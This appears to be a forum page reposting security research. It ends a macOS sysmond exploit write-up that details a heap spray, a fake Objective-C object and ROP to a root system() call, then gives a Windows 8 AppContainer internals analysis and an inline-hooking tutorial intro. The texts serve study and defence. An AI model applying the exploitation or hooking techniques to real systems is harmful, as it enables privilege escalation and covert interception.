approximately: struct ll { struct ll* forward; struct ll* backward; xpc_object_t* object; uint64_t flags; char key[0]; } This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48 will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes. The magazine malloc "small" size class heap chunks all have an alignment of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial. Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably predictable address meaning we can set the high 8 bytes of the uuid value to point to this. At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control: __text:000000000000117F __dispatch_objc_release proc near ; CODE XREF: _dispatch_release:loc_117Aj __text:000000000000117F ; _dispatch_data_create_subrange+183_p ... __text:000000000000117F mov rax, rdi __text:0000000000001182 cmp cs:__os_object_have_gc, 0 __text:0000000000001189 jnz short loc_119E __text:000000000000118B mov rcx, cs:msgRef_release__objc_msgSend_fixup __text:0000000000001192 lea rsi, msgRef_release__objc_msgSend_fixup __text:0000000000001199 mov rdi, rax __text:000000000000119C jmp rcx rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following contents: { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" } and the implementation of objc_msgSend_fixedup is: (lldb) disassemble --name objc_msgSend_fixedup libobjc.A.dylib`objc_msgSend_fixedup: 0x7fff91d5d1c4: mov RSI, QWORD PTR [RSI + 8] 0x7fff91d5d1c8: jmpq 0x7fff91d5d080 ; objc_msgSend which just calls through to objc_msgSend passing the address of the "release" string as the second argument: (lldb) disassemble --name objc_msgSend libobjc.A.dylib`objc_msgSend: 0x7fff91d5d080: test RDI, RDI 0x7fff91d5d083: je 0x7fff91d5d0f8 0x7fff91d5d086: test DIL, 1 0x7fff91d5d08a: jne 0x7fff91d5d10f 0x7fff91d5d091: mov R11, QWORD PTR [RDI] ; rdi points to controlled fake objective-c object - read pointer to objective-c class 0x7fff91d5d094: mov R10, RSI ; copy selector (pointer to string of method to call) to r10 0x7fff91d5d097: and R10D, DWORD PTR [R11 + 24] ; mask off n upper bits of the pointer according to value of fake_class+18h 0x7fff91d5d09b: shl R10, 4 ; 0x7fff91d5d09f: add R10, QWORD PTR [R11 + 16] ; use that masked off value as an index into a cache array pointed to by fake_class+10h 0x7fff91d5d0a3: cmp RSI, QWORD PTR [R10] ; does the cache entry selector match the selector passed as the second arg? 0x7fff91d5d0a6: jne 0x7fff91d5d0ac 0x7fff91d5d0a8: jmp QWORD PTR [R10 + 8] ; if so, then call the cached function implementation address Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache. All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond. Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation to move the stack to point into the heap spray and ROP to a system() call with controlled string (the poc does "touch /tmp/hello_root" as root ) [TABLE] [TR] [TD=width: 20] [/TD] [TD] sysmond_exploit_writeup.c 19.6 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=1211 point
-
Darren Pauli o sa scrie maine sa blocam si twitter ca sunt ceva malware care il folosesc drept C&C. Si poate si imgur.com, ca sunt ceva variante de zeus de comunica prin poze )) @Aerosol sa imi zici maine sa iti scriu un rss aggregator pt rst, sa nu iti mai bati capul sa dai copy/paste1 point
-
Securing Microsoft Windows 8: AppContainers Posted by Andrea Allievi On luglio 5, 2013 Recently, we have been conducting an analysis concerning the new Windows 8 security features. There are few documents available in Internet about this topic and no one of them explains the entire implementations in detail. The paper has been divided in two parts because of the complexity of the topic. Microsoft engineers have done an impressive job by improving their Operating System security. They implemented the so called “mitigations”. The term is used to indicate a new specific security feature that has the aim to make more difficult a possible attack. There are several new Security mitigations: disabled Null Page allocation, Win32k System call mitigation, “Int 0x29” Security Assertions (on double linked list, GS cookie), Non-executable non paged pool, Intel SMEP technology, Intel Secure Key technology, and so on. The reader may find a lot of useful information on the following analysis paper done by MJ0011 (presented at Hitcon 2012 security conference): http://hitcon.org/2012/download/0720A5_360.MJ0011_Reversing Windows8-Interesting Features of Kernel Security.pdf Despite the effectiveness of these mitigations, we think that the most important new characteristic is the AppContainers sandbox. We will talk about it in this analysis. Windows 8 Sandbox: AppContainer & Lowbox tokens As the reader may know, the Google Chrome browser implements a great Sandbox for web pages environment, which, even if consumes a lot of system resources, it properly works: if an attacker finds a vulnerability and succeeds in his exploitation, he will get the machine control, but only in a sandboxed environment with minimal user rights and privileges. In this environment context, the attacker can do few operations: it is prevented to open a file, to read and write, to open another process. Basing on this idea, Microsoft has conducted a research and implemented its concept of Sandbox. The AppContainer and the Lowbox tokens have been thought to implement an OS Sandbox. If you have ever developed a new Metro style application, you already know that a Metro app runs in a sandboxed context (AppContainer): if you deploy your app, you have to declare your app “Capabilities”. At present, Windows 8 defines only a small set of capabilities. If, for instance, a Metro app was able to read and write the user documents, it should declare and enable the SECURITY_DOCUMENTS_LIBRARY capability in its manifest file. All this kind of requirements are documented in the MSDN for Metro-style applications. All the Metro style applications run in a context of an AppContainer, with a Lowbox token. We are going now to analyse how this sandbox has been implemented for Metro application, and especially how Lowbox tokens are created, used and destroyed. We will try to extend the AppContainer model to all others standard Win32 executable too, even if Microsoft states that the Sandboxed environment is available only for new Metro style applications. AppPackage Capabilities snapshot AppContainers Implementation Brief introduction of Metro Apps and new Start Menu The new Metro style Start menu is managed entirely by the Explorer component. At start-up time, this Windows process decides if it has to create a new Start menu by doing the following check: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 [/TD] [TD=class: crayon-code]BOOL IsDesktopWindowAlreadyPresent() { if (FindWindow(NULL, "Progman") == NULL && FindWindow(NULL, "Proxy Desktop") == NULL) return FALSE; else return TRUE; } [/TD] [/TR] [/TABLE] If the check returns TRUE, then Explorer will send a message to its other instances to properly show “Libraries” window (created and drew from a new Thread). Otherwise it will start creating the Desktop, the Tray bar and finally the new “Immersive Launcher” start menu. The new start menu is created registering a lot of Window classes (in our tests we have counted about 45 different classes). The creation process is quite entirely managed by SHDesktopMessageLoop Shell32 routine. Analysing the creation and drawing modality of new Metro interface done by Explorer process is beyond the scope of this article. We would only like to highlight some essential implementation details: Metro style interface management is implemented, in addition to the Explorer process, also in a lot of System libraries, like Shell32, ExplorerFrame and, the most important one, Twinui. The Explorer process depends on them. The Explorer process deeply uses some MS technology, like COM+ and RPC, to communicate to other needed processes The New Metro applications sandboxing and launching is administrated by the “BrokerInfrastructure” System service and by WWAHost process. Without these two components, all Metro applications could not execute. We are going to show how they interact with Explorer process. When the user launches a Metro application, clicking his own tile in Start menu, Explorer sends an RPC message to the Broker service (that runs in “svchost.exe” process context). The broker service starts its job by checking RPC parameters and, if it is all ok, it impersonates RPC Security token (of Explorer process). Then it resolves target Metro application “AppPackage” information, and adds its security attributes to impersonation token (“WIN://SYSAPPID” attribute stores App Package Id, and “WIN://PKG” stores Package name). Each registered Metro application has indeed an AppPackage context, used to save a lot of information, as the application name, the version, the capabilities and so forth. Now the token is ready to be transformed in an AppContainer. The new token will be called Lowbox Token. The broker service may create also, if necessary, a new Lowbox token and starts WWAHost process with a particular command line used to communicate target Metro application DLL. Most of the default Metro applications are indeed DLL libraries hosted by WWAHost process. Process Explorer snapshot, showing Broker service that has launched “News” Metro application in an AppContainer environment (WWAHost process In the beginning was CreateProcess API In this subsection we are going to describe entire AppContainer process token creation. The broker service indeed exploits CreateProcessAsUser API to do actual token creation. This API is used when an application would like to launch a target process in another Security context (on behalf of another user or with an impersonation token). This system interface already existed in Windows 2000, but now, in Windows 8, its functionality has been improved. Broker service indeed launches the WWAHost process specifying a new structure in CreateProcessAsUser tenth parameter: STARTUPINFOEX. According to MSDN documentation, this structure is defined as follow: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 [/TD] [TD=class: crayon-code]typedef struct _STARTUPINFOEX { STARTUPINFO StartupInfo; PPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; } STARTUPINFOEX, *LPSTARTUPINFOEX; [/TD] [/TR] [/TABLE] lpAttributeList is an opaque attribute list structure pointer. Microsoft has provided some subsidiary system procedures to create and update the list. The only official documentation existing is the one we proposed (except for some attributes documentation).The broker service includes only one attribute in list: PROC_THREAD_ATTRIBUTE_PACKAGE_FULL_NAME. Its value is a pointer to the full Metro application Package name. Analysis of “CreateProcessAsUser” call CreateProcessAsUser is only a stub: it actually demands the entire work to its internal function CreateProcessInternalW. The latter begins with some parameters checks, it initializes its stack variables, and then it determines if EXTENDED_STARTUPINFO_PRESENT flag is present in dwCreationFlags parameter. If so, it uses BasepConvertWin32AttributeList to safely retrieve a copy of Package full name string. Then it continues processing each of the specified flags (we are not interested on details). If the package name is valid CreateProcessInternal verifies if g_bElevationPresent kernel32 symbol is set to 1: otherwise it tries to enable it with the aid of ApiSetQueryApiSetPresence function (this API seems to be able to load needed dependencies). All App Package information are retrieved thanks to BasepAppXExtension Kernel32 exported function. This is one of the key routines: its task is to open App Package and retrieve all information about it (like Capabilities, working directory and so on…). This is an internal OS function. Indeed it starts by checking the license tampering status, then it verifies the following condition: AppContainer token creation must be done from a process living in logon Session 0 (System security context) The calling process current token (primary or impersonation) must have SysAppId and Pkg Security attributes set If one of these two conditions is not satisfied, then the procedure fails with a STATUS_NOT_SUPPORTED error. Otherwise, the current token owner SID is retrieved (with GetTokenInformation Win32 API) and converted to string. This will be used to open the AppPackage registry key: AppXMiniRepository:: OpenPackageKey internal function accepts the user SID string as a parameter, it builds the AppPackage registry key in the following way: HKEY_USERS\<User SID>\Software\Classes\Local Settings\Software\Microsoft\Windows\ CurrentVersion\AppModel\Repository\Packages\<AppContPckName> where: “AppContPckName“ is the complete name of AppPackage (for example “Microsoft.BingNews_1.2.0.135_x64__8wekyb3d8bbwe”); this name will become the “Moniker” “User SID“ is the SID of the user that owns the token impersonated by the Broker service “HKEY_USERS\<User SID>“ is the link target of HKEY_CURRENT_USER key (indeed Broker service runs in System security context, and it has not the “CurrentUser” key mapped) Control returns to GetPackageInformationForCreateProcess procedure that obtains all the necessary information reading the App Package registry key values like “PackageRootFolder” (Metro application root folder), “PackageState”, “PackageSid” (AppContainer SID). Finally it parses each of the AppContainer capabilities, reading the “CapabilitySids” and the “CapabilityCount” registry values. The App package state is verified and all its dependencies are loaded… If it all went right, BasepAppXExtension returns to caller (CreateProcessInternalW) with a structure containing all the necessary information: App container SID and associated security capabilities App Package name and full path Dependency packages full path and names A snap of “CreateProcessInternal” system routine code Now the CreateProcessInternal jumps to the main user-mode internal routine that creates LowBox token: BasepCreateLowBox. User-Mode LowBox Token Creation deep analysis The Lowbox token creation begins in BasepCreateLowBox routine. Its prototype is the following: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]NTSTATUS BasepCreateLowBox (HANDLE hOrgToken, SECURITY_CAPABILITIES *pSecCap, HANDLE *hOutToken) [/TD] [/TR] [/TABLE] First of all the parameters are checked: whether the original Token handle is NULL, the current process token is retrieved with the aid of NtOpenProcessToken native API; if the original token is already an AppContainer, then the token is checked and duplicated with BasepCreateTokenFromLowboxToken routine and finally the function exits. In spite of we are now supposing, the majority of Lowbox token creation code is located in user-mode. Indeed if the original token is not an AppContainer, and all the checks mentioned succeed, a lot of things happen: control is transferred to BasepCreateLowBoxObjectDirectories procedure. This one accepts as an input the App Container SID and the token handle. If routine succeeded, it returns the following output: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: crayon-code]typedef struct _LOWBOX_DATA { HANDLE hAppContainerDir; // + 0x00 - Handle to "\Sessions\<ID>" // "\AppContainerNamedObjects\<AppContSid>" Directory HANDLE hAppContainerRpcDir; // + 0x08 - Handle to "RPC Control" AppContainer directory HANDLE hLocalSymLink; // + 0x10 - Handle to "Local" AppContainer Symbolic link object HANDLE hGlobalSymLink; // + 0x18 - Handle to "Global" AppContainer Symbolic link object HANDLE hSessionSymLink; // + 0x20 - Handle to "Session" AppContainer Symbolic link object HANDLE hAppContNamedPipe; // + 0x28 - Handle to this App Container named pipe } LOWBOX_DATA, *PLOWBOX_DATA; [/TD] [/TR] [/TABLE] BasepCreateLowBoxObjectDirectories obtains the session ID from the original token, it converts App Container SID to string and it starts to build App container directory objects strings. Indeed each of the App Containers sandbox environments is based on Logon session boundaries. That’s why two identical App Containers can be in two different sessions. “\Sessions\<ID>\BasedNamedObjects” directory is opened (where <ID> is token Session ID) with NtOpenDirectoryObject native API; its DACL is retrieved with the Original token owner user SID. The App Container Security descriptor is built with BasepBuildPackageSecurityDescriptor, starting with obtained data. The Kernel32 module builds SID with the aid of Rtl (Runtime library) internal security functions (like RtlAllocateAndInitializeSid, RtlAddAce, RtlSetDaclSecurityDescriptor and so on…); we won’t provide here the details, we’ll only show the new SID. For further details, please contact me (andrea.allievi@saferbytes.it). The new SID is composed as follow: All Access control entries of “\Sessions\<ID>\BasedNamedObjects” Access allowed App Container SID ace – List, Add Object, Add Subdir, Delete, Read Control, Special authorization permissions Access allowed App Container SID ace, Inherit only ACE – Delete, Query state and data, Modify state, Special authorization permissions The code execution flows then it returns to the BasepCreateLowBoxObjectDirectories function. At this point the routine opens “\Sessions\<ID>\AppContainerNamedObjects” the directory object, and creates a subdirectory in it (exploiting NtCreateDirectoryObjectEx native API) called as the App Container SID and protected by the Security descriptorjust created. From now we will call the latter directory on the App Container base directory. The directory is also protected with a Low integrity level ACE placed in its SACL by BasepSetKernelIntegrityLabel routine. BasepSetKernelIntegrityLabel exploits again the Rtl* internal security functions to complete its job (in summary RtlAllocateAndInitializeSid builds the low level mandatory SID; an ACL is then built containing low level SID. RtlCreateSecurityDescriptor creates the Security descriptor that contains ACL. ACL indeed is tied to Security descriptor SACL with RtlSetSaclSecurityDescriptor routine; and finally NtSetSecurityObject sets target object security information). Snapshot of “News” Windows 8 Metro application App Container directories The process of the AppContainer directory object creation is repeated for “RPC Control” subdirectory object, starting from “\RPC Control” global directory… This time a lightly different low integrity Security descriptor (built again with BasepBuildPackageSecurityDescriptor routine) is applied from what we have seen above. BasepCreateLowBoxSymbolicLinks routine is subsequently called: its job is to create “Global”, “Local” and “Session” symbolic link in the App container base directory. It does so using NtCreateSymbolicLinkObject native API. The purpose of these links is the same as the non App Container counterparts. The execution flow returns to BasepCreateLowBoxObjectDirectories which proceeds in AppContainer named pipe creation. This pipe is used in order to communicate with the Broker service and with the system management functions. It has the following name schema: “Sessions\<ID>\AppContainerNamedObjects\ <AppContainerSID>“. The named pipe is protected by the Security descriptor of AppContainer base directory with 3 additional ACEs: All access allowed ACE granted to Administrators group Generic read and generic execute access granted to Everyone group Generic read and generic execute access granted to NT AUTHORITY\RESTRICTED At this point the BasepCreateLowBoxObjectDirectories routine job is complete. Execution control is returned to BasepCreateLowBox that now can actually create Lowbox token with the NtCreateLowBoxToken Kernel mode native API. When the token is successfully created by the kernel-mode routine, the target process is created as usual but attached to the Lowbox token. Every object and resource that the new process is going to use, it will be placed in AppContainer directory instead of regular locations. Kernel-Mode LowBox Token Creation deep analysis The Kernel mode lowbox token creation starts in NtCreateLowBoxToken exported native API. As a user mode counterpart, the API accepts an original token, and transform it in a Lowbox one. This function only does what is absolutely necessary to access directly the Token object. The rest of the work is done in user-mode, as we have already seen. Indeed the procedure assumes that the AppContainer base directory, the symbolic links, the capabilities and all the package data is already retrieved. Its function prototype is the following: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 [/TD] [TD=class: crayon-code]NTSTATUS NtCreateLowBoxToken(HANDLE * phLowBoxToken, HANDLE hOrgToken, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES * pOa, PSID pAppContainerSid, DWORD capabilityCount, PSID_AND_ATTRIBUTES capabilities, DWORD lowBoxStructHandleCount, PLOWBOX_DATA lowBoxStruct); [/TD] [/TR] [/TABLE] Now we are going to describe how the function works. First of all, as usual, the parameters are checked and captured, and, whether the API is called form the user-mode, the memory is probed. The Current process security context is checked (primary or impersonating token is obtained with SeCaptureSubjectContext routine and analysed), and, if it all is ok, the original token kernel object is retrieved with ObReferenceObjectByHandle Kernel routine. The so called “capture process” checks specifically if App Container SID and each capability SID in array is valid (RtlIsPackageSid and RtlIsCapabilitySid verify the Sid size, the integrity, the package authority ID, and the sub-authority count). Now begins the Lowbox token creation: SepDuplicateToken, as the name implies, creates a copy of the original token; we will call this copy “Lowbox” token. To ? properly form Lowbox token, NtCreateLowBoxToken first setsthe token mandatory policy to “No write up” (modifying “MandatoryPolicy” and “ModifiedId” Kernel Token structure data members; see here for an extensive description of Mandatory labels and policies). Then it exploits SepLocateTokenIntegrity routine to proper localize and set the token integrity level (stored in Token object as Group SID) value to Low (Rid value: 0x1000 – SECURITY_MANDATORY_LOW_RID). The Privilege restriction takes place: all the token privileges are stripped except for SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege that later will be both disabled. SepSetTokenCapabilities procedure is called to attach each capability in array to Lowbox token: the Kernel token object has indeed three data member related to capabilities: “Capabilities”, “CapabilitiesCount” and “CapabilitiesHash”. All of these are updated by SepSetTokenCapabilities. Noteworthy is the hash value: RtlSidHashInitialize function initializes and updates the capabilities hash with the aim to hinder a possible external alteration and This makes the entire architecture quite secure. When SepSetTokenCapabilities ends its job, the execution control is transferred to SepSetTokenLowboxNumber routine. It has to generate a local per-session Lowbox Token number, and to store it, together with the App Container SID and a Reference counter, in a per-session hash-table, indexed by the global kernel symbol “g_SessionLowboxArray” (stores hashes that points to SEP_LOWBOX_NUMBER_ENTRY structure). This way Windows kernel can fast(?) the lookup Lowbox tokens and Package SIDs based only on an AppContainer Number and Session ID. When the Lowbox number is correctly generated, an associated SEP_LOWBOX_NUMBER_ENTRY structure is created; the Kernel token object “LowboxNumberEntry” data member is updated to point (?) to the brand-new structure. SepSetTokenLowboxHandles routine does quite the same work we have already seen for the token unique per-session number, but this time for the AppContainer directories and symbolic-links handles created by user-mode BasepCreateLowBoxObjectDirectories procedure, and delivered to the kernel API in lowBoxStruct parameter. A SEP_LOGON_SESSION_REFERENCES structure, that describes the current logon session, is obtained from the Lowbox token kernel object. In this structure is located the per-session Lowbox handles hash-table. This table indexes SEP_LOWBOX_HANDLES_ENTRY items. Each item stores an App Container SID, a reference counter and obviously the Lowbox handles table. SepGetLowBoxHandlesEntry adds and retrieves one item from hash-table, which SepSetTokenLowboxHandles compiles with a proper Lowbox data. This way, and with the same modality already seen, Windows kernel can fast(?)the lookup AppContainer handles table with only Package SID and session ID. Once it has finished, SepSetTokenLowboxHandles updates the Kernel token object “LowboxHandlesEntry” member with a pointer to brand-new SEP_LOWBOX_HANDLES_ENTRY data structure. LowBox Kernel token object state after SepSetTokenLowboxHandles The Kernel Lowbox token creation job is quite ended: SepSetTokenPackage copies and sets App container package SID to the relative Token kernel object “Package” data member. The Token object security context is modified: a full-access allowed ACE with AppContainer SID is added to the token default DACL. This way every object created under the Low-Box security context has by default all access granted by the App Container environment. Even the security descriptor that protects the Lowbox Token is modified: A full-access allowed ACE to AppContainer SID is added A TOKEN_QUERY access allowed ACE to built-in Administrator group is added The lowbox token is therefore fully accessible only by Owner, SYSTEM account (entity inherited) and AppContainer environment. Administrators group can query only the Lowbox token. The process is complete: ObInsertObjectEx validates and inserts Lowbox token into the Object manager namespace, and it returns an associated user-handle value (valid only for calling process). The Resources are freed and the execution control returns in user-mode. Sandboxed Environment – What does it mean? If you are here it means that you have understood the LowBox token creation and implementation. But there’s still a question that need to be answered: How is a Sandbox environment managed? What about the other OS functionalities? If the reader is curious he can try to understand Google Chrome Sandbox documentation, or maybe its source code. An application launched under a LowBox token acts in a completely different way respect to a normal program: First of all, the LowBox application can only read and write the directories, the files, and the objects that have an explicit ACE in their DACL, that allows the access to the AppContianer SID. Otherwise an ACCESS_DENIED error is returned (SeAccessCheck kernel routine implement this behaviour); even an Everyone access allowed ACE denies access to the object. It’s important to note that this assertion is totally true even for Windows registry. Our tests indeed have confirmed that no kind of Virtualization has been developed for AppContainer registry access Every operation system component, whether detects that calling thread is under the Lowbox security context, checks if the token has the necessary capabilities to execute that particular block of code. To identify properly an AppContainer security context and determine if the caller can require a particular System service, Windows OS executes the following pseudocode: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [/TD] [TD=class: crayon-code]// Get if token is an AppContainer ntStatus = ZwQueryInformationToken(hToken, TokenIsAppContainer, &bIsAppContainer, sizeof(BOOL), &retLength); if (!NT_SUCCESS(ntStatus)) return NtStatusToWin32Error(ntStatus) if (bIsAppContainer) { // Query LowBox token Capabilities PTOKEN_CAPABILITIES pTokCap = NULL; // Allocate enough buffer to contains Array (call ZwQueryInformationToken with a NULL // buffer to get exactly the needed size) pTokCap = (PTOKEN_CAPABILITIES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, buffSize); retVal = TRUE; ntStatus = ZwQueryInformationToken(hToken, TokenCapabilities, (PVOID)pTokCap, buffSize, &retLength); if (NT_SUCCESS(ntStatus)) // Get if needed capability is present in Calling token capabilities array // PSID pNeededCapSid is needed capability retVal = IsCapabilityPresent(pNeededCapSid, pTokCap->Capabilities, pTokCap->CapabilityCount); if (!retVal || NT_ERROR(ntStatus)) return ERROR_ACCESS_DENIED; } // ...... // ... Main function body ... // ...... [/TD] [/TR] [/TABLE] We made some tests to spot the different behaviour showed by standard Windows Win32 API if called from an AppContainer security context. We will see now how to launch the standard Win32 application under an AppContainer. Our test done for INTERNET_CLIENT and PRIVATE_NETWORK_CLIENT_SERVER capabilities in network communications shows that this the capabilities checks code is implemented in network AFD kernel driver. Our Win32 application has tried to connect to the Internet and download a file, but it didn’t work without the associated enabled capabilities. The fact that the checks are implemented in Kernel mode makes the entire Sandbox much more powerful. Unfortunately, we did not identify where the Capability check of the following Metro application code snippet is performed: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 [/TD] [TD=class: crayon-code]StorageFolder sf = KnownFolders.DocumentsLibrary; StorageFile file = await sf.CreateFileAsync("Test.txt”, CreationCollisionOption.OpenIfExists); string text = await Windows.Storage.FileIO.ReadTextAsync(file); [/TD] [/TR] [/TABLE] We have also tried to translate the above snippet in Win32 code, using the standard CreateFile API or some COM+ interfaces. The Results are the same: every attempt to open and read “Test.txt” file located in “User document” folder requires an explicit ACE attached to it, that allows access to AppContainer SID, even if DOCUMENTS_LIBRARY capability is enabled in the Lowbox token. Therefore, based on our quick analysis, it seems that this time Microsoft has implemented the Capability check code in mscorlib.dll Net framework main library. We don’t know why, maybe we didn’t take some aspect into consideration. By the way understanding how every capability is checked in various operating System components can be definitively a good Research project. If some reader would like to investigate on this, please contact me (andrea.allievi@saferbytes.it). Saferbytes Win32 Appcontainer applications We have seen that to properly create a Lowbox token and to launch a Win32 application under a sandboxed environment, we have to do many things: to add the proper security attributes to the token, to create and modify the Package registry keys and, most important, we have to inject our code in a system service due to the session 0 isolation. While analysing the CreateProcessInternalW internal function we found another way to launch an application under an AppContainer. The New STARTUPINFOEX structure can contain even an instance of PROC_THREAD_SECURITY_CAPABILITIES attribute. Therefore we have to define only an App Container SID and a list of capabilities that our AppContainer will have enabled (take a look at the documented SECURITY_CAPABILITIES structure). Unfortunately it is not so simple. TokenExtCreateEnvironment kernel32 routine, that is called immediately when BasepCreateLowBox returns, lookups App Container “moniker” from system registry with the aim to create a sandboxed environment. The AppContainerLookupMoniker retrieves the calling thread token User Sid, and together with the Lowbox package SID, opens the following registry key: HKEY_USERS\<User SID>\Software\Classes\Local Settings\Software\Microsoft\Windows\ CurrentVersion\AppContainer\Mappings\<AppContSid> Next it reads “Moniker” value. The moniker is the human readable App Container name. Moniker name is needed to create Sandboxed environment. Indeed TokenExtCreateEnvironment function creates the target application “Environment block” starting from system environment, but modifying the following three variables: “LocalAppData” is set to “<original LocalAppData>\Packages\<Moniker name>\AC” “Temp” and “Tmp”, are both set to “<original LocalAppData>\Packages\<Moniker name>\AC\Temp” We can easily deduce that the folder locate in “c:\Users\<UserName>\AppData\Local\Packages\<Moniker name>” will become the main working path for the sandboxed environment (this is not a necessary condition however); and the registry key “HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\ CurrentVersion\AppContainer\Storage\<AppContSid>” will became the main working registry key. These two directories need a proper ACE to be correctly accessible as we have seen before (there are no exception from sandbox model) So, in order to create an AppContainer sandbox for our Win32 application we acted as follows: Create “Moniker” registry key and append an Access allowed ACE with Lowbox package SID in its DACL Create sandbox main directory and registry key, and append a proper ACE as seen before Create and compile a proper SECURITY_CAPABILITIES structure containing App Container SID and all enabled capabilities Finally call CreateProcessAsUser Windows API At the end, if it all has been done in the right way, the results are good, as showed in the picture below: Our test application launched in a Sandbox environment The picture shows even what we have already analysed: PRIVATE_NETWORK_CLIENT_SERVER capability allows our application to communicate with an external server, whereas DOCUMENTS_LIBRARY seems to not work. Conclusions Our analysis and tests show that Microsoft engineers have made a great job in creating a Sandboxed environment for their Operating System new applications type. We have seen that it’s possible to create an OS based sandboxed environments even for standard Win32 programs. The main problem is that there no documentation about it. We are wondering why MS doesn’t release a proper documentation about the AppContainer and the Lowbox tokens. Furthermore we have concluded that in current OS implementation there are only few capabilities available. We hope that Microsoft could release a complete set of capabilities for each Operating system component in the next Windows 8.1 OS. I developed a simple application able to define an AppContainer package, to create a proper directories and objects, and to launch standard Win32 applications under an OS sandboxed environment. We will release this in a few weeks, basing on the readers’ requests. Snapshot of Saferbytes AppContainer launcher application For today that’s all folks! We will review others Windows 8 Security capabilities in next part of analysis. A quick note: according to Davide LeBlanc thoughts (thanks for the hint), we have to clarify that Microsoft has not been inspired by Google for its sandbox. Reading developer’s blog post series about Sandbox, we can understand that there were some ideas regarding a software Sandbox at least starting from year 2008. Sursa: Securing Microsoft Windows 8: AppContainers1 point
-
[h=1]Inline Hooking for Programmers (Part 1: Introduction)[/h] A lot of my articles have been aimed at giving a high-level insight into malware for beginners, or those unfamiliar with specific concepts. Today I've decided to start a new series designed to familiarize people with malware internals on a programming level. This will not be a tutorial aimed towards people creating sophisticated malware, but security enthusiasts looking to better understand it. [h=2]Inline Hooking[/h] What is it Inline hooking is a method of intercepting calls to target functions,which is mainly used by antiviruses, sandboxes, and malware. The general idea is to redirect a function to our own, so that we can perform processing before and/or after the function does its; this could include: checking parameters, shimming, logging, spoofing returned data, and filtering calls. Rootkits tend to use hooks to modify data returned from system calls in order to hide their presence, whilst security software uses them to prevent/monitor potentially malicious operations. The hooks are placed by directly modifying code within the target function (inline modification), usually by overwriting the first few bytes with a jump; this allows execution to be redirected before the function does any processing. Most hooking engines use a 32-bit relative jump (opcode 0xE9), which takes up 5 bytes of space. Problems we face Might need to call the original function which we've overwritten with a jump. Race conditions. Calling convention mismatches. Infinite recursion. How it works We will be using a trampoline based hook, which allows us to intercept functions, whilst still being able to call the originals (without unhooking them first). this hook is made up of 3 parts: The Hook - A 5 byte relative jump which is written to the target function in order to hook it, the jump will jump from the hooked function to our code. The Proxy - This is our specified function (or code) which the hook placed on the target function will jump to. The Trampoline - Used to bypass the hook so we can call a hooked function normally. Why Trampoline Let's say we want to hook MessageBoxA, print out the parameters from within the proxy function, then display the message box: In order to display the message box, we need to call MessageBoxA (which redirects to our proxy function, which in turn calls MessageBoxA). Obviously calling MessageBoxA from within our proxy function will just cause infinite recursion and the program with eventually crash due to a stack overflow. We could simply unhook MessageBoxA from within the proxy function, call it, then re hooking it; but if multiple threads are calling MessageBoxA at the same time, this would cause a race condition and possibly crash the program. Instead, what we can do is store the first 5 bytes of MessageBoxA (these are overwritten by our hook), then when we need to call the non hooked MessageBoxA, we can execute the stored first 5 bytes, followed by a jump 5 bytes into MessageBoxA (directly after the hook). If you're having trouble visualizing that, I've made a call graph. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Top is a normal call to non-hooked MessageBoxA, bottom is a call using our trampoline to bypass the hook.[/TD] [/TR] [/TABLE] As long as the first 5 bytes aren't relative instructions, they can be executed anywhere (because it's very rare for functions to use relative instructions so early on, so we don't really need to handle this). A problem we do need to handle is if the first 5 bytes of the function don't make up n whole instructions). In the example, the first 5 bytes of the function make up exactly 3 instructions (mov edi, edi; push ebp; mov ebp, esp), however, if for example, the first instruction was 10 bytes long and we only stored 5 bytes: the trampoline would be trying to execute half an instruction and the program would explode. To get around this, we must use a disassemble to get the length of each instruction, so we can make sure only to copy whole instructions. The best case scenario is the first n instructions add up to exactly 5 bytes, the worst case is if the first instruction is 4 bytes and the second is 16 (the maximum length of an x86 instruction), we must store 20 bytes (4 + 16), meaning our trampoline must be 25 bytes in size (space for up to 20 bytes worth of instructions and a 5 byte jump back to the hooked function). It's important to note that the return jump must jump to the hooked function n bytes in, where n is however many instructions we stored in the trampoline. Sursa: Inline Hooking 